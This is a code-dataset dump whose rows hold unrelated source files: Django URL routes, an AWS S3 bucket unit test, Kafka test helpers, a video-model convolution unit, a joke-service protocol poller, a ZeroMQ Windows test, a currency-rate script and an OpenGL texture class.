max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
crits/ips/urls.py | dutrow/crits | 738 | 30995 | <reponame>dutrow/crits<filename>crits/ips/urls.py
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^search/$', views.ip_search, name='crits-ips-views-ip_search'),
url(r'^search/(?P<ip_str>\S+)/$', views.ip_search, name='crits-ips-views-ip_search'),
url(r'^details/(?P<ip>\S+)/$', views.ip_detail, name='crits-ips-views-ip_detail'),
url(r'^remove/$', views.remove_ip, name='crits-ips-views-remove_ip'),
url(r'^list/$', views.ips_listing, name='crits-ips-views-ips_listing'),
url(r'^list/(?P<option>\S+)/$', views.ips_listing, name='crits-ips-views-ips_listing'),
url(r'^bulkadd/$', views.bulk_add_ip, name='crits-ips-views-bulk_add_ip'),
url(r'^(?P<method>\S+)/$', views.add_update_ip, name='crits-ips-views-add_update_ip'),
]
|
atlas/aws_utils/src/test/test_aws_bucket.py | DeepLearnI/atlas | 296 | 31018 | <filename>atlas/aws_utils/src/test/test_aws_bucket.py
import unittest
from mock import Mock
from foundations_spec import *
from foundations_aws.aws_bucket import AWSBucket
class TestAWSBucket(Spec):
class MockListing(object):
def __init__(self, bucket, files):
self._bucket = bucket
self._files = files
def __call__(self, Bucket, Prefix, Delimiter):
if Bucket != self._bucket:
return {}
return {
'Contents': [{'Key': Prefix + key} for key in self._grouped_and_prefixed_files(Prefix, Delimiter)],
'CommonPrefixes': [{'Prefix': Prefix + new_prefix} for new_prefix in self._unique_delimited_prefixes(Prefix, Delimiter)]
}
def _unique_delimited_prefixes(self, prefix, delimiter):
items = set()
# below is done to preserve order
for key in self._prefixes(prefix, delimiter):
if not key in items:
items.add(key)
yield key
def _prefixes(self, prefix, delimiter):
for key in self._prefixed_files(prefix):
if delimiter in key:
yield key.split(delimiter)[0]
def _grouped_and_prefixed_files(self, prefix, delimiter):
for key in self._prefixed_files(prefix):
if not delimiter in key:
yield key
def _prefixed_files(self, prefix):
prefix_length = len(prefix)
for key in self._files:
if key.startswith(prefix):
yield key[prefix_length:]
connection_manager = let_patch_mock(
'foundations_aws.global_state.connection_manager'
)
connection = let_mock()
mock_file = let_mock()
@let
def file_name(self):
return self.faker.name()
@let
def data(self):
return self.faker.sha256()
@let
def data_body(self):
mock = Mock()
mock.read.return_value = self.data
mock.iter_chunks.return_value = [self.data]
return mock
@let
def bucket_prefix(self):
return self.faker.name()
@let
def bucket_postfix(self):
return self.faker.uri_path()
@let
def bucket_name_with_slashes(self):
return self.bucket_prefix + '/' + self.bucket_postfix
@let
def upload_file_name_with_slashes(self):
return self.bucket_postfix + '/' + self.file_name
@let
def bucket(self):
return AWSBucket(self.bucket_path)
@let
def bucket_with_slashes(self):
return AWSBucket(self.bucket_name_with_slashes)
@let
def bucket_path(self):
return 'testing-bucket'
@let
def source_path(self):
return self.faker.name()
@let
def source_path_with_slashes(self):
return self.bucket_postfix + '/' + self.source_path
@set_up
def set_up(self):
self.connection_manager.bucket_connection.return_value = self.connection
def test_upload_from_string_uploads_data_to_bucket_with_prefix(self):
self.bucket_with_slashes.upload_from_string(self.file_name, self.data)
self.connection.put_object.assert_called_with(Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes, Body=self.data)
def test_exists_returns_true_when_file_exists_with_prefix(self):
self.bucket_with_slashes.exists(self.file_name)
self.connection.head_object.assert_called_with(Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
def test_download_as_string_uploads_data_to_bucket_with_prefix(self):
self.connection.get_object = ConditionalReturn()
self.connection.get_object.return_when({'Body': self.data_body}, Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
result = self.bucket_with_slashes.download_as_string(self.file_name)
self.assertEqual(self.data, result)
def test_download_to_file_uploads_data_to_bucket_with_prefix(self):
self.connection.get_object = ConditionalReturn()
self.connection.get_object.return_when({'Body': self.data_body}, Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
result = self.bucket_with_slashes.download_to_file(self.file_name, self.mock_file)
self.mock_file.write.assert_called_with(self.data)
def test_remove_removes_prefixed_files(self):
self.bucket_with_slashes.remove(self.file_name)
self.connection.delete_object.assert_called_with(Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
def test_move_moves_prefixed_files(self):
self.bucket_with_slashes.move(self.source_path, self.file_name)
source_info = {'Bucket': self.bucket_prefix, 'Key': self.source_path_with_slashes}
self.connection.copy_object.assert_called_with(Bucket=self.bucket_prefix, CopySource=source_info, Key=self.upload_file_name_with_slashes)
def test_list_files_returns_empty(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
[]
)
self.assertEqual([], self._fetch_listing('*'))
def test_list_files_returns_all_results(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log']
)
self.assertEqual(['my.txt', 'scheduler.log'], self._fetch_listing('*'))
def test_list_files_returns_file_type_filter(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log']
)
self.assertEqual(['my.txt'], self._fetch_listing('*.txt'))
def test_list_files_returns_all_results_dot_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log']
)
self.assertEqual(['my.txt', 'scheduler.log'],
self._fetch_listing('./*'))
def test_list_files_returns_file_type_filter_dot_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log']
)
self.assertEqual(['my.txt'], self._fetch_listing('./*.txt'))
def test_list_files_returns_only_local_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log', 'path/to/some/other/files']
)
self.assertEqual(['my.txt', 'scheduler.log', 'path'], self._fetch_listing('*'))
def test_list_files_returns_only_sub_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log', 'path/to/some/other/files']
)
self.assertEqual(['path/to/some/other/files'], self._fetch_listing('path/to/some/other/*'))
def test_list_files_returns_folder_within_sub_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['path/to/some/other/files']
)
self.assertEqual(['path/to'], self._fetch_listing('path/*'))
def test_list_files_returns_arbitrary_filter(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['some_stuff_here', 'no_stuff_there', 'some_more_stuff_here']
)
self.assertEqual(['some_stuff_here', 'some_more_stuff_here'], self._fetch_listing('some_*_here'))
def test_list_files_supports_prefixes(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_prefix,
[self.upload_file_name_with_slashes]
)
result = list(self.bucket_with_slashes.list_files('*'))
self.assertEqual([self.file_name], result)
def _fetch_listing(self, pathname):
generator = self.bucket.list_files(pathname)
return list(generator)
|
pykafka/test/utils.py | Instamojo/pykafka | 1,174 | 31027 | import time
import os
from pykafka.test.kafka_instance import KafkaInstance, KafkaConnection
def get_cluster():
"""Gets a Kafka cluster for testing, using one already running is possible.
An already-running cluster is determined by environment variables:
BROKERS, ZOOKEEPER, KAFKA_BIN. This is used primarily to speed up tests
in our Travis-CI environment.
"""
if os.environ.get('BROKERS', None) and \
os.environ.get('ZOOKEEPER', None) and \
os.environ.get('KAFKA_BIN', None):
# Broker is already running. Use that.
return KafkaConnection(os.environ['KAFKA_BIN'],
os.environ['BROKERS'],
os.environ['ZOOKEEPER'],
os.environ.get('BROKERS_SSL', None))
else:
return KafkaInstance(num_instances=3)
def stop_cluster(cluster):
"""Stop a created cluster, or merely flush a pre-existing one."""
if isinstance(cluster, KafkaInstance):
cluster.terminate()
else:
cluster.flush()
def retry(assertion_callable, retry_time=10, wait_between_tries=0.1, exception_to_retry=AssertionError):
"""Retry assertion callable in a loop"""
start = time.time()
while True:
try:
return assertion_callable()
except exception_to_retry as e:
if time.time() - start >= retry_time:
raise e
time.sleep(wait_between_tries)
|
mlcomp/contrib/model/video/resnext3d/r2plus1_util.py | megachester/mlcomp | 166 | 31046 | <gh_stars>100-1000
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import torch.nn as nn
def r2plus1_unit(
dim_in,
dim_out,
temporal_stride,
spatial_stride,
groups,
inplace_relu,
bn_eps,
bn_mmt,
dim_mid=None,
):
"""
Implementation of `R(2+1)D unit <https://arxiv.org/abs/1711.11248>`_.
Decompose one 3D conv into one 2D spatial conv and one 1D temporal conv.
Choose the middle dimensionality so that the total No. of parameters
in 2D spatial conv and 1D temporal conv is unchanged.
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temporal_stride (int): the temporal stride of the bottleneck.
spatial_stride (int): the spatial_stride of the bottleneck.
groups (int): number of groups for the convolution.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
bn_eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
dim_mid (Optional[int]): If not None, use the provided channel dimension
for the output of the 2D spatial conv. If None, compute the output
channel dimension of the 2D spatial conv so that the total No. of
model parameters remains unchanged.
"""
if dim_mid is None:
dim_mid = int(
dim_out * dim_in * 3 * 3 * 3 / (dim_in * 3 * 3 + dim_out * 3))
logging.info(
"dim_in: %d, dim_out: %d. Set dim_mid to %d" % (
dim_in, dim_out, dim_mid)
)
# 1x3x3 group conv, BN, ReLU
conv_middle = nn.Conv3d(
dim_in,
dim_mid,
[1, 3, 3], # kernel
stride=[1, spatial_stride, spatial_stride],
padding=[0, 1, 1],
groups=groups,
bias=False,
)
conv_middle_bn = nn.BatchNorm3d(dim_mid, eps=bn_eps, momentum=bn_mmt)
conv_middle_relu = nn.ReLU(inplace=inplace_relu)
# 3x1x1 group conv
conv = nn.Conv3d(
dim_mid,
dim_out,
[3, 1, 1], # kernel
stride=[temporal_stride, 1, 1],
padding=[1, 0, 0],
groups=groups,
bias=False,
)
return nn.Sequential(conv_middle, conv_middle_bn, conv_middle_relu, conv)
|
challenges/CNMP/poller/for-testing/machine.py | pingjuiliao/cb-multios | 473 | 31093 | <gh_stars>100-1000
#!/usr/bin/env python
#
# Copyright (C) 2014 Narf Industries <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from generator.actions import Actions
from random import choice, randint
from os.path import dirname, abspath, join
import imp
import random
import string
import sys
CNMP_DIR = dirname(dirname(dirname(abspath(__file__))))
sys.path.append(join(CNMP_DIR, "support"))
from jokes import Jokes
def random_alpha(a, b):
return ''.join(choice(string.letters) for _ in range(randint(a, b)))
def random_string(a, b):
chars = string.letters + string.digits
return ''.join(choice(chars) for _ in range(randint(a, b)))
def random_digits(a, b):
chars = string.digits
return ''.join(choice(chars) for _ in range(randint(a, b)))
class CNMP(Actions):
MAX_JOKES=256
MAX_JOKE_STRING_LEN=512
JOKE_ID_CHAR_LEN=11
CMD_CHAR_LEN=20
def _load_jokes(self):
self.state['jokes'] = Jokes().get_jokes()
def start(self):
self._load_jokes()
self.read(delim="\n",
expect="This is the Chuck Norris (joke) Management Protocol (CNMP).\n",
expect_format='asciic')
self.read(delim="\n",
expect="We know you need a break, so take some time and amuse yourself. " \
"If you have a good Chuck Norris joke, you can add it to our listing.\n",
expect_format='asciic')
def menu(self):
self.read(delim="\n",
expect="Enter one of these commands:\n",
expect_format='asciic')
self.read(delim="\n",
expect=" LIST - list all jokes\n",
expect_format='asciic')
self.read(delim="\n",
expect=" ADD - upload your own joke\n",
expect_format='asciic')
self.read(delim="\n",
expect=" COUNT - find out how many jokes we have to offer you\n",
expect_format='asciic')
self.read(delim="\n",
expect=" SHOW - show a joke\n",
expect_format='asciic')
self.read(delim="\n",
expect=" MENU - display this menu\n",
expect_format='asciic')
self.read(delim="\n",
expect=" HELP - you gotta be kididin' me!\n",
expect_format='asciic')
self.read(delim="\n",
expect=" QUIT - take off eh?\n",
expect_format='asciic')
def root_prompt(self):
self.read(delim='> ', expect='> ', expect_format='asciic')
def empty(self):
self.write("\x07")
def quit(self):
self.write("QUIT\x07")
expect_str = "Thanks for the laughs. Come back soon!\n"
self.read(delim='\n', expect=expect_str, expect_format='asciic')
return -1
def help(self):
self.write("HELP\x07")
expect_str = "Is our menu so extensive that you cannot remember all of the commands? " \
"Here, let me jog all 6 of your neurons:\n"
self.read(delim='\n', expect=expect_str, expect_format='asciic')
def list_jokes(self):
self.write("LIST\x07")
# joke is list of lines with format "joke_id: joke\n"
for idx, joke in enumerate(self.state['jokes'], 0):
self.read(delim='\n',
expect="{0}: {1}\n".format(idx, joke),
expect_format='asciic')
def count(self):
self.write("COUNT\x07")
# read count string
expect_str = "Current CNMP joke count is {0}. Enjoy!\n".format(len(self.state['jokes']))
self.read(delim='\n', expect=expect_str, expect_format='asciic')
def menu_cmd(self):
self.write("MENU\x07")
def bad_cmd_die(self):
# submit a bad command; will exit connection
# bad command: (self.CMD_CHAR_LEN chars w/o trailing '\x07')
# have to stay w/in CMD_CHAR_LEN else poller will fail attempting to
# write the extra bytes that the CB will never read
cmd = random_string(self.CMD_CHAR_LEN, self.CMD_CHAR_LEN)
expect_str = "\nAre you kidding me? What is that garbage? " \
"I thought my instructions were pretty straight forward. " \
"Try again.\n"
self.write('{0}'.format(cmd))
self.read(delim='.\n', expect=expect_str, expect_format='asciic')
return -1
def add_msg(self):
expect_str = ""
self.write("ADD\x07")
self.read(delim="\n", expect="So, you think you have a good <NAME> joke? "\
"Give me the joke string already....\n", expect_format='asciic')
self.read(delim='> ', expect='ADD> ', expect_format='asciic')
# submit a bad message; will exit connection
# bad message: (> MAX_JOKE_STRING_LEN chars, i.e. MAX_JOKE_STRING_LEN*'A' w/o '\x07')
if self.chance(0.0001):
joke = random_string(self.MAX_JOKE_STRING_LEN, self.MAX_JOKE_STRING_LEN)
expect_str = "\nAre you kidding me? What is that garbage? " \
"I thought my instructions were pretty straight forward. " \
"Try again.\n"
self.write('{0}'.format(joke))
self.read(delim='.\n', expect=expect_str, expect_format='asciic')
return -1
# submit a bad joke
# bad joke (MAX_JOKE_STRING_LEN-1 chars, i.e (MAX_JOKE_STRING_LEN-1)*'A' + \x07)
elif self.chance(0.001):
joke = random_string(self.MAX_JOKE_STRING_LEN - 1, self.MAX_JOKE_STRING_LEN - 1)
expect_str = "\nThat joke you gave me is crap! " \
"For that, you get to start over!\n"
self.write('{0}\x07'.format(joke))
self.read(delim='!\n', expect=expect_str, expect_format='asciic')
else:
joke = random_string(1, self.MAX_JOKE_STRING_LEN - 2)
self.write('{0}\x07'.format(joke))
joke_count = len(self.state['jokes'])
if joke_count < self.MAX_JOKES:
# add a joke
expect_str = "Joke added. Thanks for sharing! Your joke is ID: {0}\n".format(joke_count)
self.state['jokes'].append(joke)
else:
# joke db is full
expect_str = "Lordy, lordy, I've had enough <NAME> jokes. Go away.\n"
self.read(delim='\n', expect=expect_str, expect_format='asciic')
def show(self):
expect_str = "Give me the ID of the joke you want to read. Or better yet, " \
"enter RANDOM and I'll choose one for you.\n"
self.write("SHOW\x07")
self.read(delim="\n", expect=expect_str, expect_format="asciic")
def show_prompt(self):
expect_str = 'SHOW> '
self.read(delim='> ', expect=expect_str, expect_format='asciic')
def show_msg_good(self):
expect_str = ""
expect_format='asciic'
joke_id = ""
# find the easteregg joke
if self.chance(0.001):
joke_id = "1337"
expect_str = "Congratulations, you are the only person in the past, present " \
"or future to beat <NAME>.\n"
else:
# choose a RANDOM joke
if self.chance(0.2):
joke_id = "RANDOM"
expect_str = "[0-9]+: (.*)\n"
expect_format='pcre'
else:
# id form 0 to joke_count - 1
joke_count = len(self.state['jokes'])
joke_id = str(randint(0, joke_count - 1))
expect_str = "{0}: {1}\n".format(joke_id, self.state['jokes'][int(joke_id)])
self.write("{0}\x07".format(joke_id))
self.read(delim='\n', expect=expect_str, expect_format=expect_format)
def show_msg_bad(self):
# submit a bad joke id, w/ len < self.JOKE_ID_CHAR_LEN
joke_id = ""
if self.chance(0.33):
# numeric < 0
joke_id = "-1{0}".format(random_digits(1,self.JOKE_ID_CHAR_LEN - 5))
elif self.chance(0.33):
#not numeric that is not "RANDOM", w/ len < self.JOKE_ID_CHAR_LEN
joke_id = random_alpha(1, self.JOKE_ID_CHAR_LEN - 1)
if joke_id == "RANDOM":
joke_id = random_alpha(1, self.JOKE_ID_CHAR_LEN - 1)
# submit a bad joke id w/ len = self.JOKE_ID_CHAR_LEN w/o '\x07'
# will exit connection
elif self.chance(0.0001):
joke_id = "1{0}".format(random_digits(self.JOKE_ID_CHAR_LEN-1, self.JOKE_ID_CHAR_LEN-1))
self.write("{0}".format(joke_id))
expect_str = "\nAre you kidding me? What is that garbage? " \
"I thought my instructions were pretty straight forward. Try again.\n"
self.read(delim='.\n', expect=expect_str, expect_format='asciic')
return -1
else:
# number >= len(jokedb), not 1337, w/ len < self.JOKE_ID_CHAR_LEN
joke_id = len(self.state['jokes']) + 1338
self.write("{0}\x07".format(joke_id))
expect_str = "\nWhat do you take me for? That ID is bogus! Try again.\n"
self.read(delim='.\n', expect=expect_str, expect_format='asciic')
|
venv/Lib/site-packages/zmq/tests/test_win32_shim.py | ajayiagbebaku/NFL-Model | 603 | 31097 | <filename>venv/Lib/site-packages/zmq/tests/test_win32_shim.py<gh_stars>100-1000
from __future__ import print_function
import os
import time
import sys
from functools import wraps
from pytest import mark
from zmq.tests import BaseZMQTestCase
from zmq.utils.win32 import allow_interrupt
def count_calls(f):
@wraps(f)
def _(*args, **kwds):
try:
return f(*args, **kwds)
finally:
_.__calls__ += 1
_.__calls__ = 0
return _
@mark.new_console
class TestWindowsConsoleControlHandler(BaseZMQTestCase):
@mark.new_console
@mark.skipif(not sys.platform.startswith('win'), reason='Windows only test')
def test_handler(self):
@count_calls
def interrupt_polling():
print('Caught CTRL-C!')
from ctypes import windll
from ctypes.wintypes import BOOL, DWORD
kernel32 = windll.LoadLibrary('kernel32')
# <http://msdn.microsoft.com/en-us/library/ms683155.aspx>
GenerateConsoleCtrlEvent = kernel32.GenerateConsoleCtrlEvent
GenerateConsoleCtrlEvent.argtypes = (DWORD, DWORD)
GenerateConsoleCtrlEvent.restype = BOOL
# Simulate CTRL-C event while handler is active.
try:
with allow_interrupt(interrupt_polling) as context:
result = GenerateConsoleCtrlEvent(0, 0)
# Sleep so that we give time to the handler to
# capture the Ctrl-C event.
time.sleep(0.5)
except KeyboardInterrupt:
pass
else:
if result == 0:
raise WindowsError()
else:
self.fail('Expecting `KeyboardInterrupt` exception!')
# Make sure our handler was called.
self.assertEqual(interrupt_polling.__calls__, 1)
|
requests__examples/yahoo_api__rate_currency.py | DazEB2/SimplePyScripts | 117 | 31104 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# TODO: использовать http://www.cbr.ru/scripts/Root.asp?PrtId=SXML или разобраться с данными от query.yahooapis.com
# непонятны некоторые параметры
# TODO: сделать консоль
# TODO: сделать гуй
# TODO: сделать сервер
import requests
rs = requests.get('https://query.yahooapis.com/v1/public/yql?q=select+*+from+yahoo.finance.xchange+where+pair+=+%22USDRUB,EURRUB%22&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys&callback=')
print(rs.json())
for rate in rs.json()['query']['results']['rate']:
print(rate['Name'], rate['Rate'])
|
PyEngine3D/OpenGLContext/Texture.py | ubuntunux/PyEngine3D | 121 | 31111 | import traceback
import copy
import gc
from ctypes import c_void_p
import itertools
import array
import math
import numpy as np
from OpenGL.GL import *
from PyEngine3D.Common import logger
from PyEngine3D.Utilities import Singleton, GetClassName, Attributes, Profiler
from PyEngine3D.OpenGLContext import OpenGLContext
def get_numpy_dtype(data_type):
if GL_BYTE == data_type:
return np.int8
elif GL_UNSIGNED_BYTE == data_type:
return np.uint8
elif GL_UNSIGNED_BYTE == data_type:
return np.uint8
elif GL_SHORT == data_type:
return np.int16
elif GL_UNSIGNED_SHORT == data_type:
return np.uint16
elif GL_INT == data_type:
return np.int32
elif GL_UNSIGNED_INT == data_type:
return np.uint32
elif GL_UNSIGNED_INT64 == data_type:
return np.uint64
elif GL_FLOAT == data_type:
return np.float32
elif GL_DOUBLE == data_type:
return np.float64
logger.error('Cannot convert to numpy dtype. UNKOWN DATA TYPE(%s)', data_type)
return np.uint8
def get_internal_format(str_image_mode):
if str_image_mode == "RGBA":
return GL_RGBA8
elif str_image_mode == "RGB":
return GL_RGB8
elif str_image_mode == "L" or str_image_mode == "P" or str_image_mode == "R":
return GL_R8
else:
logger.error("get_internal_format::unknown image mode ( %s )" % str_image_mode)
return GL_RGBA8
def get_texture_format(str_image_mode):
if str_image_mode == "RGBA":
# R,G,B,A order. GL_BGRA is faster than GL_RGBA
return GL_RGBA # GL_BGRA
elif str_image_mode == "RGB":
return GL_RGB
elif str_image_mode == "L" or str_image_mode == "P" or str_image_mode == "R":
return GL_RED
else:
logger.error("get_texture_format::unknown image mode ( %s )" % str_image_mode)
return GL_RGBA
def get_image_mode(texture_internal_format):
if texture_internal_format in (GL_RGBA, GL_BGRA):
return "RGBA"
elif texture_internal_format in (GL_RGB, GL_BGR):
return "RGB"
elif texture_internal_format == GL_RG:
return "RG"
elif texture_internal_format in (GL_R8, GL_R16F, GL_RED, GL_DEPTH_STENCIL, GL_DEPTH_COMPONENT):
return "R"
elif texture_internal_format == GL_LUMINANCE:
return "L"
else:
logger.error("get_image_mode::unknown image format ( %s )" % texture_internal_format)
return "RGBA"
def CreateTexture(**texture_datas):
texture_class = texture_datas.get('texture_type', Texture2D)
if texture_class is not None:
if type(texture_class) is str:
texture_class = eval(texture_class)
return texture_class(**texture_datas)
return None
class Texture:
target = GL_TEXTURE_2D
default_wrap = GL_REPEAT
use_glTexStorage = False
def __init__(self, **texture_data):
self.name = texture_data.get('name')
self.attachment = False
self.image_mode = "RGBA"
self.internal_format = GL_RGBA8
self.texture_format = GL_RGBA
self.sRGB = False
self.clear_color = None
self.multisample_count = 0
self.width = 0
self.height = 0
self.depth = 1
self.data_type = GL_UNSIGNED_BYTE
self.min_filter = GL_LINEAR_MIPMAP_LINEAR
self.mag_filter = GL_LINEAR
self.enable_mipmap = False
self.wrap = self.default_wrap
self.wrap_s = self.default_wrap
self.wrap_t = self.default_wrap
self.wrap_r = self.default_wrap
self.buffer = -1
self.sampler_handle = -1
self.attribute = Attributes()
self.create_texture(**texture_data)
def create_texture(self, **texture_data):
if self.buffer != -1:
self.delete()
self.attachment = False
self.image_mode = texture_data.get('image_mode')
self.internal_format = texture_data.get('internal_format')
self.texture_format = texture_data.get('texture_format')
self.sRGB = texture_data.get('sRGB', False)
self.clear_color = texture_data.get('clear_color')
self.multisample_count = 0
if self.internal_format is None and self.image_mode:
self.internal_format = get_internal_format(self.image_mode)
if self.texture_format is None and self.image_mode:
self.texture_format = get_texture_format(self.image_mode)
if self.image_mode is None and self.texture_format:
self.image_mode = get_image_mode(self.texture_format)
# Convert to sRGB
if self.sRGB:
if self.internal_format == GL_RGB:
self.internal_format = GL_SRGB8
elif self.internal_format == GL_RGBA:
self.internal_format = GL_SRGB8_ALPHA8
if GL_RGBA == self.internal_format:
self.internal_format = GL_RGBA8
if GL_RGB == self.internal_format:
self.internal_format = GL_RGB8
self.width = int(texture_data.get('width', 0))
self.height = int(texture_data.get('height', 0))
self.depth = int(max(1, texture_data.get('depth', 1)))
self.data_type = texture_data.get('data_type', GL_UNSIGNED_BYTE)
self.min_filter = texture_data.get('min_filter', GL_LINEAR_MIPMAP_LINEAR)
self.mag_filter = texture_data.get('mag_filter', GL_LINEAR) # GL_LINEAR_MIPMAP_LINEAR, GL_LINEAR, GL_NEAREST
mipmap_filters = (GL_LINEAR_MIPMAP_LINEAR, GL_LINEAR_MIPMAP_NEAREST,
GL_NEAREST_MIPMAP_LINEAR, GL_NEAREST_MIPMAP_NEAREST)
self.enable_mipmap = self.min_filter in mipmap_filters
if self.target == GL_TEXTURE_2D_MULTISAMPLE:
self.enable_mipmap = False
self.wrap = texture_data.get('wrap', self.default_wrap) # GL_REPEAT, GL_CLAMP
self.wrap_s = texture_data.get('wrap_s')
self.wrap_t = texture_data.get('wrap_t')
self.wrap_r = texture_data.get('wrap_r')
self.buffer = -1
self.sampler_handle = -1
# texture parameter overwrite
# self.sampler_handle = glGenSamplers(1)
# glSamplerParameteri(self.sampler_handle, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)
# glBindSampler(0, self.sampler_handle)
logger.info("Create %s : %s %dx%dx%d %s mipmap(%s)." % (
GetClassName(self), self.name, self.width, self.height, self.depth, str(self.internal_format),
'Enable' if self.enable_mipmap else 'Disable'))
self.attribute = Attributes()
def __del__(self):
pass
def delete(self):
logger.info("Delete %s : %s" % (GetClassName(self), self.name))
glDeleteTextures([self.buffer, ])
self.buffer = -1
def get_texture_info(self):
return dict(
texture_type=self.__class__.__name__,
width=self.width,
height=self.height,
depth=self.depth,
image_mode=self.image_mode,
internal_format=self.internal_format,
texture_format=self.texture_format,
data_type=self.data_type,
min_filter=self.min_filter,
mag_filter=self.mag_filter,
wrap=self.wrap,
wrap_s=self.wrap_s,
wrap_t=self.wrap_t,
wrap_r=self.wrap_r,
)
def get_save_data(self):
save_data = self.get_texture_info()
data = self.get_image_data()
if data is not None:
save_data['data'] = data
return save_data
def get_mipmap_size(self, level=0):
if 0 < level:
divider = 2.0 ** level
width = max(1, int(self.width / divider))
height = max(1, int(self.height / divider))
return width, height
return self.width, self.height
def get_image_data(self, level=0):
if self.target not in (GL_TEXTURE_2D, GL_TEXTURE_2D_ARRAY, GL_TEXTURE_3D):
return None
level = min(level, self.get_mipmap_count())
dtype = get_numpy_dtype(self.data_type)
try:
glBindTexture(self.target, self.buffer)
data = OpenGLContext.glGetTexImage(self.target, level, self.texture_format, self.data_type)
# convert to numpy array
if type(data) is bytes:
data = np.fromstring(data, dtype=dtype)
else:
data = np.array(data, dtype=dtype)
glBindTexture(self.target, 0)
return data
except:
logger.error(traceback.format_exc())
logger.error('%s failed to get image data.' % self.name)
logger.info('Try to glReadPixels.')
glBindTexture(self.target, self.buffer)
fb = glGenFramebuffers(1)
glBindFramebuffer(GL_FRAMEBUFFER, fb)
data = []
for layer in range(self.depth):
if GL_TEXTURE_2D == self.target:
glFramebufferTexture2D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, self.buffer, level)
elif GL_TEXTURE_3D == self.target:
glFramebufferTexture3D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_3D, self.buffer, level, layer)
elif GL_TEXTURE_2D_ARRAY == self.target:
glFramebufferTextureLayer(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, self.buffer, level, layer)
glReadBuffer(GL_COLOR_ATTACHMENT0)
width, height = self.get_mipmap_size(level)
pixels = glReadPixels(0, 0, width, height, self.texture_format, self.data_type)
# convert to numpy array
if type(pixels) is bytes:
pixels = np.fromstring(pixels, dtype=dtype)
data.append(pixels)
data = np.array(data, dtype=dtype)
glBindTexture(self.target, 0)
glBindFramebuffer(GL_FRAMEBUFFER, 0)
glDeleteFramebuffers(1, [fb, ])
return data
def get_mipmap_count(self):
factor = max(max(self.width, self.height), self.depth)
return math.floor(math.log2(factor)) + 1
def generate_mipmap(self):
if self.enable_mipmap:
glBindTexture(self.target, self.buffer)
glGenerateMipmap(self.target)
else:
logger.warn('%s disable to generate mipmap.' % self.name)
def texure_wrap(self, wrap):
glTexParameteri(self.target, GL_TEXTURE_WRAP_S, wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_T, wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_R, wrap)
def bind_texture(self, wrap=None):
if self.buffer == -1:
logger.warn("%s texture is invalid." % self.name)
return
glBindTexture(self.target, self.buffer)
if wrap is not None:
self.texure_wrap(wrap)
def bind_image(self, image_unit, level=0, access=GL_READ_WRITE):
if self.buffer == -1:
logger.warn("%s texture is invalid." % self.name)
return
# flag : GL_READ_WRITE, GL_WRITE_ONLY, GL_READ_ONLY
glBindImageTexture(image_unit, self.buffer, level, GL_FALSE, 0, access, self.internal_format)
def is_attached(self):
return self.attachment
def set_attachment(self, attachment):
self.attachment = attachment
def get_attribute(self):
self.attribute.set_attribute("name", self.name)
self.attribute.set_attribute("target", self.target)
self.attribute.set_attribute("width", self.width)
self.attribute.set_attribute("height", self.height)
self.attribute.set_attribute("depth", self.depth)
self.attribute.set_attribute("image_mode", self.image_mode)
self.attribute.set_attribute("internal_format", self.internal_format)
self.attribute.set_attribute("texture_format", self.texture_format)
self.attribute.set_attribute("data_type", self.data_type)
